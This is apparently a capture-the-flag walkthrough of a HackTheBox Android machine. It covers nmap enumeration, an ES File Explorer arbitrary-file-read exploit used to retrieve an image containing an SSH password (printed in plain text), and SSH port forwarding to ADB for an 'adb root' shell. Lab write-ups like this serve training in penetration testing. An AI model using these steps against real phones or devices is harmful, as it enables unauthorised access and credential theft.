As always we start with nmap to discover open ports.
Nmap Scan
nmap -sC -sV -oA explore 10.10.10.247
Starting Nmap 7.80 ( https://nmap.org ) at 2021-07-02 15:57 EET
Nmap scan report for 10.10.10.247 (10.10.10.247)
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
2222/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_ 2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp filtered freeciv
35971/tcp closed unknown
42135/tcp open http ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port2222-TCP:V=7.80%I=7%D=7/2%Time=60DF1B3D%P=x86_64-pc-linux-gnu%r(NUL
SF:L,24,"SSH-2\.0-SSH\x20Server\x20-\x20Banana\x20Studio\r\n");
Service Info: Device: phoneEnumeration
First of all, lets look for exploits for these services (ES File Explorer & Bukkit JSONAPI). Found an arbitrary file read exploit for ( ES File Explorer 4.1.9.7.4) and didn’t find any other exploits, so lets just try it.
By reading the exploit code, it’s sending a POST request with Content-Type: application/json header and a json POST data as {“command”: cmd} to http://10.10.10.247:59777/.
Lets first try the exploit manually before running the python script. Now visit http://10.10.10.247:59777/ intercept the request with burp or ZAP and send to repeater and edit the request as the exploit says. And we got a response with the device info.
Now that we understand how the exploit works, lets run the script because it parses the json response and make our life easier.
While enumeration i found that the ES File Explorer version is 4.1.9.7.3, that’s why the exploit works ( if there’s an exploit for a specific version, it may work on older versions too).
Initial Foothold
While trying every command i tried listPics and found interesting picture (creds.jpg).
I downloaded this picture using python3 exploit.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg and opened it. It has credentials in it.
kristi:Kr1sT!5h@Rp3xPl0r3!
Now lets ssh to the box with these creds and we are in.
Getting root
Doing some research on the ports we found earlier, Port 5555 is for Android Debug Bridge (ADB) connections. And found on hacktricks how to use this service to get root shell.
https://book.hacktricks.xyz/mobile-apps-pentesting/android-app-pentesting/adb-commands
POC:
- First, We have to do port forwarding using ssh because the service is running on localhost only.
ssh -p 2222 -L 1337:localhost:5555 kristi@10.10.10.247
- That means 127.0.0.1:1337 ==> 10.10.10.247:5555
- Connect to ADB service (port 5555) using adb tool.
adb connect <IP>:<PORT>
- Check if the phone is connected to your pc.
adb devices
- Now using adb tool we can do anything on the device, so to get root type
adb root
- to restart adbd daemon with root permissions.
- Connect again to the ADB service.
adb connect <IP>:<PORT> - Finally.
adb shell
